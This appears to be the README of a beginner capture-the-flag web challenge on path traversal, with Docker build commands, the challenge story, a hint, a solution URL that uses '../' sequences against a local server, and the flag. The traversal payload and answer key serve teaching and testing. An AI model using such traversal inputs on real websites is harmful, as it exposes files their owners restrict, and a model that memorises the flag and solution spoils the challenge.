# Web Easy - Path Traversal
## Description
Simple path traversal challenge.

## Author(s)
- RPScylla

## ToDo:
- Make better webpage
- Include better flag
- Error handeling when trying to open folder?

## How to build/host
- Docker image
- Text instructions on CTFd
- Hint on CTFd

### Docker compile commands
```
sudo docker build --rm -t web_traverse .
sudo docker run --rm -d -p 8080:8080 web_traverse
```

### Text instructions
> We found a website on how to reset the firewall. The only problem is they don't list the tutorial on the public website only on the members page. Unfortunately we don't have access to the member page.

### Hint
> The ?p= parameter in the url looks interesting../ 

## Solution
<details>
<summary>Click to show</summary>

Simple path traversion.

<pre><code>http://localhost:8080/?p=../../../memberpage/resetInstruction.html</code></pre>

</details>

### Flag
PTH{7r4v3r51n6_7r0u6h_7h3_5y573m}